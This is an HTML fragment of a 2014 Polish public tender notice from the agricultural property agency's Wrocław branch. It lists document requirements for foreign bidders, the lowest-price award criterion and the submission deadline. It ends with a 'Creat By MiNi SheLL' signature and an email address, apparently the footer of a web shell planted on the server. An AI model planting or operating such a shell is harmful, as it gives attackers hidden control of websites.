<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, ul. Mińska 60.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2014 godzina 09:00, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, ul. Mińska 60, kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com